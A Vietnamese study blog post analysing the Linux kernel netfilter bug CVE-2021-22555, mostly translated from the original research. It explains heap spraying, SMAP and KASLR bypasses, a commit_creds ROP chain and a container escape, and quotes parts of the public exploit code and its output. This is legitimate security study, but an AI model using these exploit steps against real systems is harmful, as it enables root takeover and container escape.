Tìm hiểu về CVE-2021-22555

Bài viết này nhằm mục đích học tập cá nhân, ghi lại những kiến thức đã học để nhớ và hiểu rõ hơn. Bài viết tham khảo chủ yếu từ CVE-2021-22555: Turning \x00\x00 into 10000$, phần lớn là dịch từ bài viết gốc cộng thêm một số lí giải của tôi.

Tổng quan về lỗ hổng

Lỗ hổng cho phép ghi dữ liệu ra ngoài vùng nhớ được cấp phát trên heap (heap out-of-bounds write).
Những phiên bản bị ảnh hưởng: Linux kernel *v2.6.19-rc1 - v5.12-rc8

Môi trường thực thi, kiểm thử

Ubuntu 20.04
Linux kernel: 5.8.0-48-generic

Phân tích lỗ hổng

Lỗ hổng được xác định nằm ở trong hàm xt_compat_target_from_user của /net/netfilter/x_tables.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
				unsigned int *size)
{
	const struct xt_target *target = t->u.kernel.target;
	struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
	int pad, off = xt_compat_target_offset(target);
	u_int16_t tsize = ct->u.user.target_size;	/* size field read from the compat entry */
	char name[sizeof(t->u.user.name)];

	t = *dstptr;	/* from here on t is the destination entry at the cursor */
	memcpy(t, ct, sizeof(*ct));
	if (target->compat_from_user)
		target->compat_from_user(t->data, ct->data);
	else
		memcpy(t->data, ct->data, tsize - sizeof(*ct));
	pad = XT_ALIGN(target->targetsize) - target->targetsize;	/* bytes needed to round targetsize up to XT_ALIGN */
	if (pad > 0)
		memset(t->data + target->targetsize, 0, pad);	/* the zero-fill this article analyses as the out-of-bounds write */

	tsize += off;
	t->u.user.target_size = tsize;
	strlcpy(name, target->name, sizeof(name));
	module_put(target->me);
	strncpy(t->u.user.name, name, sizeof(t->u.user.name));

	*size += off;
	*dstptr += tsize;	/* advance the cursor past the converted target */
}

Tại line 17-18, chương trình ghi pad byte 0 vào vùng nhớ bắt đầu từ t->data + target->targetsize. Vấn đề là target->targetsize không được tính đến khi cấp phát vùng nhớ đích, do đó pad byte 0 này có thể bị ghi ra ngoài vùng nhớ đã được cấp phát (out-of-bounds).
Chúng ta không thể kiểm soát được giá trị của target->targetsize nhưng có thể sử dụng nhiều target với nhiều kích thước khác nhau bởi tên của chúng. Ví dụ như (TCPMSS, TTL, NFQUEUE)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57


// net/netfilter/xt_NFLOG.c
static struct xt_target nflog_tg_reg __read_mostly = {
    .name       = "NFLOG",
    .revision   = 0,
    .family     = NFPROTO_UNSPEC,
    .checkentry = nflog_tg_check,
    .destroy    = nflog_tg_destroy,
    .target     = nflog_tg,
    .targetsize = sizeof(struct xt_nflog_info), /* the value read as target->targetsize during compat conversion */
    .me         = THIS_MODULE,
};

// net/netfilter/xt_NFQUEUE.c
/*
 * The NFQUEUE target is registered once per revision (0..3). Each revision
 * carries its own info struct, so each has a different .targetsize; user
 * space selects one by target name plus revision.
 */
static struct xt_target nfqueue_tg_reg[] __read_mostly = {
    {
        /* revision 0 (implicit): no checkentry hook */
        .name       = "NFQUEUE",
        .family     = NFPROTO_UNSPEC,
        .target     = nfqueue_tg,
        .targetsize = sizeof(struct xt_NFQ_info),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 1,
        .family     = NFPROTO_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .target     = nfqueue_tg_v1,
        .targetsize = sizeof(struct xt_NFQ_info_v1),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 2,
        .family     = NFPROTO_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .target     = nfqueue_tg_v2,
        .targetsize = sizeof(struct xt_NFQ_info_v2),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 3,
        .family     = NFPROTO_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .target     = nfqueue_tg_v3,
        .targetsize = sizeof(struct xt_NFQ_info_v3),
        .me         = THIS_MODULE,
    },
};

Để thỏa điều kiện pad > 0, target size phải không chia hết cho 8 (không được căn chỉnh 8 bytes); ngoài ra, target size càng lớn thì khoảng offset mà ta có thể chọn càng rộng. Target có kích thước lớn nhất mà tác giả tìm được là NFLOG; với nó, chúng ta có thể chọn offset lên đến 0x4c bytes out-of-bounds (chúng ta có thể thay đổi offset bằng cách thêm padding vào giữa 2 cấu trúc struct xt_entry_match và struct xt_entry_target):

1
2
3
4
5
6
7
8
9


struct xt_nflog_info{
    /* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */
    __u32   len;
    __u16   group;
    __u16   threshold;
    __u16   flags;
    __u16   pad;
    char    prefix[64]; /* members total 4 + 2*4 + 64 = 76 (0x4c) bytes, which is not a multiple of 8 */
};

Bên cạnh đó, t->data được cấp phát bởi hàm xt_alloc_table_info trong /net/netfilter/x_tables.c

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
	struct xt_table_info *info = NULL;
	size_t sz = sizeof(*info) + size;	/* header plus the caller-supplied payload size */

	if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)	/* refuse a wrapped-around or oversized total */
		return NULL;

	info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);	/* single allocation holding header and payload */
	if (!info)
		return NULL;

	memset(info, 0, sizeof(*info));	/* only the header is zeroed here, not the payload */
	info->size = size;
	return info;
}

Vùng nhớ được ghi cấp phát ở line 9 với flag GFP_KERNEL_ACCOUNT và kích thước là sz
Mặc dù vậy, kích thước tối thiểu > 0x100, có nghĩa kích thước nhỏ nhất của đối tượng có thể cấp phát là kmalloc-512. Chúng ta tìm đối tượng được cấp phát giữa kmalloc-512 và kmalloc-8192 để khai thác.

~~Tại sao biết 0x100? size là đối tượng chúng ta truyền vào, do đó, để biết cần trace xem hàm này được gọi ở đâu?~~ Vì kích thước của struct xt_table_info = 0x100

Kích thước SIZE này chúng ta kiểm soát được bằng cách tìm xem hàm xt_alloc_table_info được gọi, ví dụ như hàm static int compat_do_replace():

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


static int
compat_do_replace(struct net *net, void __user *user, unsigned int len)
{
    int ret;
    struct compat_ipt_replace tmp;
    struct xt_table_info *newinfo;
    void *loc_cpu_entry;
    struct ipt_entry *iter;

    if (copy_from_user(&tmp, user, sizeof(tmp)) != 0) // tmp, including tmp.size, is filled in from user space
        return -EFAULT;

    /* overflow check */
    if (tmp.num_counters >= INT_MAX / sizeof(struct xt_counters))
        return -ENOMEM;
    if (tmp.num_counters == 0)
        return -EINVAL;

    tmp.name[sizeof(tmp.name)-1] = 0;

    newinfo = xt_alloc_table_info(tmp.size);  // the user-supplied tmp.size becomes the allocation size
    ......
}

Vì t->data chúng ta có thể kiểm soát được thông qua size, nên bây giờ ta tìm cách đưa nó về cuối cùng của heap block. Ta xem xét hàm compat_copy_entry_from_user

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


static void
compat_copy_entry_from_user(struct compat_ipt_entry *e, void **dstptr,
                unsigned int *size,
                struct xt_table_info *newinfo, unsigned char *base)
{
    struct xt_entry_target *t;
    struct ipt_entry *de;
    unsigned int origsize;
    int h;
    struct xt_entry_match *ematch;

    origsize = *size;
    de = *dstptr;   /* the native entry is written at the current cursor */
    memcpy(de, e, sizeof(struct ipt_entry));
    memcpy(&de->counters, &e->counters, sizeof(e->counters));

    *dstptr += sizeof(struct ipt_entry);    /* move the cursor past the entry header */
    *size += sizeof(struct ipt_entry) - sizeof(struct compat_ipt_entry);

    xt_ematch_foreach(ematch, e)
        xt_compat_match_from_user(ematch, dstptr, size);    /* each converted match advances *dstptr further */

    de->target_offset = e->target_offset - (origsize - *size);
    t = compat_ipt_get_target(e);
    xt_compat_target_from_user(t, dstptr, size);    /* the target is converted wherever the cursor has ended up */

    de->next_offset = e->next_offset - (origsize - *size);

    for (h = 0; h < NF_INET_NUMHOOKS; h++) {    /* shift hook/underflow offsets located after this entry by the size delta */
        if ((unsigned char *)de - base < newinfo->hook_entry[h])
            newinfo->hook_entry[h] -= origsize - *size;
        if ((unsigned char *)de - base < newinfo->underflow[h])
            newinfo->underflow[h] -= origsize - *size;
    }
}

Chúng ta thấy tại line 17, dòng lệnh *dstptr += sizeof(struct ipt_entry); sẽ đẩy con trỏ *dstptr (và do đó cả t->data về sau) tiến gần hơn về phía cuối của heap block. Sau đó, trong hàm xt_compat_match_from_user, tại line 26, con trỏ này tiếp tục được cộng thêm (*dstptr += msize), làm cho t->data một lần nữa tiến gần hơn về phía cuối heap block.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr, unsigned int *size)
{
    const struct xt_match *match = m->u.kernel.match;
    struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
    int pad, off = xt_compat_match_offset(match);
    u_int16_t msize = cm->u.user.match_size;    /* size field read from the compat entry */
    char name[sizeof(m->u.user.name)];

    m = *dstptr;    /* from here on m is the destination entry at the cursor */
    memcpy(m, cm, sizeof(*cm));
    if (match->compat_from_user)
        match->compat_from_user(m->data, cm->data);
    else
        memcpy(m->data, cm->data, msize - sizeof(*cm));
    pad = XT_ALIGN(match->matchsize) - match->matchsize;    /* bytes needed to round matchsize up to XT_ALIGN */
    if (pad > 0)
        memset(m->data + match->matchsize, 0, pad);

    msize += off;
    m->u.user.match_size = msize;
    strlcpy(name, match->name, sizeof(name));
    module_put(match->me);
    strncpy(m->u.user.name, name, sizeof(m->u.user.name));

    *size += off;
    *dstptr += msize;    /* advance the cursor by the converted match size */

}

và msize được kiểm soát bằng cách xây dựng cấu trúc dữ liệu ở tầng user. Do đó, chúng ta có một chiến lược, là kiểm soát msize -> dstptr->t->data về cuối cùng của heap block, sau đó kiểm soát target->targetsize để ghi vào nội dung vào heap block tiếp theo.

Khai thác lỗ hổng

struct msg_msg

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


// include/linux/types.h
/* Doubly linked list node; shown first because struct msg_msg embeds one. */
struct list_head {
    struct list_head *next, *prev;
};

// include/linux/msg.h
/* one msg_msg struct for each message */
struct msg_msg{
    struct list_head m_list;    /* links the message into its queue */
    long m_type;
    size_t m_ts;    /* message text size */
    struct msg_msgseg *next;    /* first continuation segment; set to NULL by alloc_msg() */
    void *security;
    /* the actual message follows immediately */
};

// ipc/msgutil.c
/* Header of one continuation segment of a message. */
struct msg_msgseg{
    struct msg_msgseg *next;
    /* The next part of the message follow immediately*/
};

struct msg_msg được cấp phát khi gọi lời gọi hệ thống msgsnd, thông qua hàm alloc_msg() trong ipc/msgutil.c

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36


/*
 * Allocate the storage for a message whose text is len bytes long.
 * The first min(len, DATALEN_MSG) bytes share one allocation with the
 * struct msg_msg header; whatever remains goes into a chain of msg_msgseg
 * allocations of at most DATALEN_SEG text bytes each, linked through ->next.
 * Returns the msg_msg, or NULL when any allocation fails.
 */
static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    alen = min(len, DATALEN_MSG);
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); /* header and first chunk in one object */
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen;
    pseg = &msg->next; /* pseg always points at the link the next segment must be stored in */
    while (len > 0){
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG);
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
        if (seg == NULL)
            goto out_err;
        *pseg = seg;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg); /* presumably releases msg together with the segments linked so far; free_msg is not shown here */
    return NULL;
}

len là kích thước dữ liệu của cấu trúc msg_msg.

Tạo ra UAF

Nhiều message queues được tạo khi sử dụng msgget().
Sau đó, sử dụng msgsnd() để gửi message với kích thước 4096 cho mỗi message queue.
Cuối cùng, sau khi gửi một số lượng lớn các messages, một số cấu trúc struct msg_msg trong message queue được cấp phát liên tục trên heap.
.
Sau đó, msgsnd để gửi một message có kích thước 1024 tới mỗi message queue. Message có kích thước 1024 sẽ xâu chuỗi với message kích thước 4096 và lưu trong thành phần struct list_head của struct msg_msg.
.
Khi gọi msgrcv để đọc các phần của 4096 message, nó sẽ giải phóng vùng nhớ mà cấu trúc msg_msg đã giữ trên heap.
.
Cuối cùng, khi gọi hàm xt_alloc_table_info, đối tượng struct xt_table_info (nếu may mắn) sẽ được cấp phát vào một trong những block 4096 trên heap vừa được giải phóng ở bước trước đó. Lí tưởng nhất là block nằm ngay sau nó vẫn chứa một cấu trúc struct msg_msg A chưa bị giải phóng; khi đó chúng ta có thể dùng lỗi out-of-bounds để ghi 2 byte 0 đè lên các byte thấp của con trỏ m_list.next của A.
.
Khi đó có khả năng 2 cấu trúc struct msg_msg kích thước 4096 cùng trỏ tới cùng một cấu trúc struct msg_msg B kích thước 1024: B vừa được tham chiếu bởi message 4096 của chính hàng đợi chứa nó, vừa bị tham chiếu bởi một message 4096 khác, và từ đó UAF sẽ xuất hiện.
.
Để xác định cấu trúc struct msg_msg B có đang bị trỏ tới 2 lần hay không, ta gửi message có nội dung tương ứng với số thứ tự của hàng đợi: ví dụ message 1 có nội dung là 1, message 2 có nội dung là 2, …, message thứ 4096 có nội dung là 4096. Sau khi kích hoạt lỗi, ta đọc qua message của từng hàng đợi; nếu message nào đọc ra có nội dung không tương ứng với chỉ mục của hàng đợi đó, có nghĩa nó không thuộc về hàng đợi này, điều này cũng có nghĩa đang tồn tại 2 cấu trúc cùng trỏ tới cấu trúc B.

Bypass SMAP

Đến đây, struct msg_msg B đang bị double referenced: ta dùng tham chiếu thứ nhất để giải phóng B, còn tham chiếu còn lại vẫn trỏ tới B và chúng ta có thể kiểm soát được nó.
Bây giờ chúng ta dùng hàm socketpair() để spray heap, spray lượng lớn các message với kích thước 1024 và tạo ra một fake struct struct msg_msg structure. lý tưởng chúng ta có thể phục hồi cấu trúc msg_msg B đã bị giải phóng.

Chú ý rằng mlist.next là 41414141 vì chúng ta chưa biết bất kì địa chỉ nào của kernel (khi SMAP được bật, chúng ta không thể dùng một địa chỉ của userland). Việc chưa có địa chỉ của kernel là vấn đề quan trọng vì nó khiến chúng ta chưa thể giải phóng vùng nhớ này thêm 1 lần nữa. Nguyên nhân là trong hàm msgrcv(), message được hủy liên kết (unlink) khỏi hàng đợi, mà hàng đợi là một danh sách liên kết vòng.
Một số trường của cấu trúc struct msg_msg cho phép chúng ta leak được những thông tin này. Cụ thể, trường m_ts được dùng để xác định lượng dữ liệu trả về cho userland:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
    struct msg_msgseg *dst_pseg, *src_pseg;
    size_t len = src->m_ts;    /* the amount to copy is taken from the source header */
    size_t alen;

    if (src->m_ts > dst->m_ts)    /* destination must be at least as large as the source text */
        return ERR_PTR(-EINVAL);

    alen = min(len, DATALEN_MSG);
    memcpy(dst + 1, src + 1, alen);    /* text begins immediately after each struct msg_msg header */

    ...
    return dst;
}

Kích thước ban đầu của message này là 1024-sizeof(struct msg_msg) bytes; bằng cách làm giả m_ts, chúng ta có thể tăng nó lên thành DATALEN_MSG=4096-sizeof(struct msg_msg). Do đó chúng ta có thể đọc vượt quá kích thước thật của message và leak được header struct msg_msg của message kế tiếp. Message queue được hiện thực như 1 danh sách vòng tròn, do đó, mlist.next sẽ trỏ về message chính.
Khi biết được địa chỉ của message chính, chúng ta có thể tạo lại fake struct msg_msg với địa chỉ đó đặt ở trường next (segment tiếp theo). Nội dung của message chính có thể được leak bằng cách đọc nhiều hơn DATALEN_MSG bytes. Con trỏ mlist.next được leak từ message chính sẽ tiết lộ địa chỉ của message thứ 2, message này nằm kề cấu trúc struct msg_msg mà chúng ta muốn làm giả. Lấy địa chỉ này trừ đi 1024, chúng ta sẽ có được địa chỉ của message mà chúng ta muốn kiểm soát.

~~vẫn chưa hiểu primary message là gì? trỏ như thế nào?~~ Đọc kĩ hơn phần phân tích POC, flow thì sẽ hiểu rõ

Một use-after-free tốt hơn.

Tới đây chúng ta phải xây dựng được một cấu trúc giả struct msg_msg với địa chỉ leak được là mlist.next và mlist.prev (nghĩa là nó tự trỏ tới chính nó), bây giờ làm sao để fake message bị free trong hàng đợi fake message -queue.

better_uaf1

Khi sử dụng unix sockets, chúng ta có một đối tượng struct sk_buff trỏ tới fake message. Điều này có nghĩa khi chúng ta giải phóng tin nhắn giả của mình, tham thảo tới nó vẫn còn tồn ở đó.

dữ liệu của vùng nhớ trên struct sk_buff là một chất liệu tuyệt vời để khai thác, vì nó không chưa thông tin tiêu đề nào, nghĩa là chúng ta có thể sử dụng nó để giải phóng bất kì đối tượng nào trên vùng nhớ này. Trong khi đó, nếu so sánh với kịch bản uaf thì chúng ta phải giải phóng đối tượng struct msg_msg, điều này chỉ được thực hiện nếu hai phần tử đầu tiên của con trỏ có thể ghi được

Tìm đối tượng khai thác

Đối tượng khai thác tốt nhất là đối tượng có con trỏ hàm trong cấu trúc của nó. Victim phải được cấp phát với GFP_KERNEL_ACCOUNT.

Cấu trúc struct pipe_buffer được cấp phát tròng kmalloc-1024 (đây là lí do tại sao mesage thứ 2 là 1024 bytes). Cấu trúc struct pipe_buffer có thể được cấp phát dễ dàng với pipe() mà có hàm alloc_pipe_info() như một chương trình con:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
    ...
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    ...
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
        goto out_free_uid;
    ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT);    /* array of pipe_bufs pipe_buffer structs in a single allocation */
    ...
}

Nó không trực tiếp chứa con trỏ hàm, nó chứa con trỏ tới cấu trúc struct pipe_buf_operations mà cấu trúc này lại có con trỏ hàm mà chúng ta cần:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h

struct pipe_buffer{
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;    /* indirection to the function-pointer table below */
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When The contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    ...
};

Bypassing KASLR/SMEP

Khi viết vào pipes, câu trúc struct pipe_buffer bị ghi đè, trong đó ops nó trỏ tới một cấu trúc tĩnh nằm trên .data segment: anon_pipe_buf_ops:

1
2
3
4
5
6


    // https://git.kernel.org/pub/scm/linux/kernel/git/tovalds/linux.git/tree/fs/pipe.c
    static const struct pipe_buf_operations alloc_pipe_buf_ops = {
            .release        = anon_pipe_buf_release,
            .try_steal      = anon_pipe_buf_try_steal,
            .get            = generic_pipe_buf_get,
    };

Vì khoảng cách giữa địa chỉ của .data segment và .text không đổi, nên ta tính được địa chỉ của kernel_base_addr từ anon_pipe_buf_ops.

~~Tính như thế nào?~~ Mô tả ở phần POC

Spray (phun) nhiều cấu trúc struct pipe_buffer để chúng chiếm lại vị trí data buffer của struct sk_buff đã bị giải phóng.
Chúng ta đọc dữ liệu từ sk_buff để leak nội dung của struct pipe_buffer và lấy địa chỉ của anon_pipe_buf_ops.
Với thông tin này, chúng ta sẽ tìm JOP/ROP gadgets. Lưu ý rằng khi đọc từ unix socket, vùng nhớ của nó cũng sẽ bị giải phóng.

Nâng quyền

Tạo một cấu trúc struct pipe_buffer giả với một con trỏ ops trỏ tới một cấu trúc struct pipe_buf_operations giả. Cấu trúc giả này được đặt tại cùng vị trí (vì chúng ta đã biết địa chỉ của nó) và chứa con trỏ hàm release mà chúng ta muốn thực thi khi buffer được giải phóng.
Cuối cùng, đóng hết tất cả các pipes => kích hoạt giải phóng vùng nhớ => kích hoạt JOP chain.

Kernel ROP chain

Lưu giá trị của RBP tại một số địa chỉ trong kernel để sử dụng lại khi khôi phục luồng thực thi
=> gọi commit_creds(prepare_kernel_cred(NULL)) để install kernel credentials
=> gọi switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) để thay không gian tên (namespace) của tiến trình 1 bằng không gian tên của tiến trình init.
=> khôi phục giá trị của RBP và trả về để tiếp tục luồng thực thi đã dừng (free_pipe_info() trả về).

Thoát container và nhảy vào root shell

1
2
3
4
5
6


    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
    setns(open("/proc/1/ns/net", O_RDONLY), 0);

    char *args[] = {"/bin/bash", "-i", NULL};
    execve(args[0], args, NULL);

Phân tích POC

Tiếp theo, chúng ta sẽ đi phân tích poc của Andy Nguyen
Như demo, poc của anh Andy Nguyen cho thấy rất rõ các bước để khai thác từ việc khởi tạo ở STAGE0 đến làm tràn bộ nhớ ở STAGE1, vượt qua SMAP, KASLR, thực thi mã khai thác và thoát khỏi container.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44


[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...

STAGE0 - Khởi tạo

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


  printf("[+] STAGE 0: Initialization\n");

  printf("[*] Setting up namespace sandbox...\n");
  if (setup_sandbox() < 0)
    goto err_no_rmid;

  printf("[*] Initializing sockets and message queues...\n");

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("[-] socket");
    goto err_no_rmid;
  }

  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
      perror("[-] socketpair");
      goto err_no_rmid;
    }
  }

  for (int i = 0; i < NUM_MSQIDS; i++) {
    if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
      perror("[-] msgget");
      goto err_no_rmid;
    }
  }

  printf("\n");

msqid stand for: Message queue identifier,

Hàm setup_sandbox() tạo user namespace và network namespace mới (dòng 2-9), sau đó ghim tiến trình vào CPU 0 bằng sched_setaffinity (dòng 11-17) nhằm mục đích phục vụ quá trình spray các message.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


int setup_sandbox(void) {  // returns 0 on success, -1 after perror() on the first failing call
  if (unshare(CLONE_NEWUSER) < 0) {  // move into a new user namespace first
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }
  if (unshare(CLONE_NEWNET) < 0) {  // then into a new network namespace
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }

  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);  // the mask contains CPU 0 only
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {  // restrict this process to that single CPU
    perror("[-] sched_setaffinity");
    return -1;
  }

  return 0;
}

Lưu ý, hàm unshare ở dòng 2 và 6 có thể bị chặn bởi cơ chế Seccomp trên docker. Khi đó, hoặc bạn có thể không gọi hai lệnh này, hoặc bạn có thể chạy docker với tùy chọn --security-opt seccomp=unconfined:

1
2


docker run --rm -it --security-opt seccomp=unconfined debian:jessie \
    unshare --map-root-user --user sh -c whoami

Sau đó, chúng ta khởi tạo socket, tạo socketpair (dòng 14-19) và dùng hàm msgget() để tạo hàng đợi messages (dòng 21-26)

STAGE1 - Làm tràn bộ nhớ

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61


printf("[+] STAGE 1: Memory corruption\n");

  printf("[*] Spraying primary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_primary, 0, sizeof(msg_primary));
    *(int *)&msg_primary.mtext[0] = MSG_TAG;
    *(int *)&msg_primary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }

  printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }

  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }

  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;

  printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }

  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }

  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);

  printf("\n");

Spraying primary messages

Cấu trúc của primary messages được xây dựng:

1
2
3
4


struct {
  long mtype;  // message type; write_msg() overwrites it before sending
  char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];  // text sized so that header plus text add up to PRIMARY_SIZE
} msg_primary;

với MSG_MSG_SIZE là kích thước của cấu trúc msg_msg:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


#define MSG_MSG_SIZE (sizeof(struct msg_msg))  // 6 * 8 = 48 bytes with the layout below

// User-space stand-in for a message header: every member, pointers included,
// is declared as a plain 64-bit integer so a forged header can be filled in
// field by field.
struct msg_msg {
  uint64_t m_list_next;
  uint64_t m_list_prev;
  uint64_t m_type;
  uint64_t m_ts;
  uint64_t next;
  uint64_t security;
};

Hàm write_msg:

1
2
3
4
5
6
7
8


/*
 * Stamp msgtyp into the leading long of the caller's buffer and enqueue the
 * buffer on msqid. msgsz is the size of the whole buffer, type field
 * included. Returns 0 on success, -1 (after perror) when msgsnd() fails.
 */
int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  long *type_field = (long *)msgp; /* const is cast away: the buffer is written to */
  const size_t text_len = msgsz - sizeof(long); /* msgsnd() takes the text size only */

  *type_field = msgtyp;
  if (msgsnd(msqid, msgp, text_len, 0) >= 0)
    return 0;

  perror("[-] msgsnd");
  return -1;
}

Hàm này gọi msgsnd để gửi những message có kích thước là 4096. Cấu trúc msg_primary bắt nguồn từ lệnh này
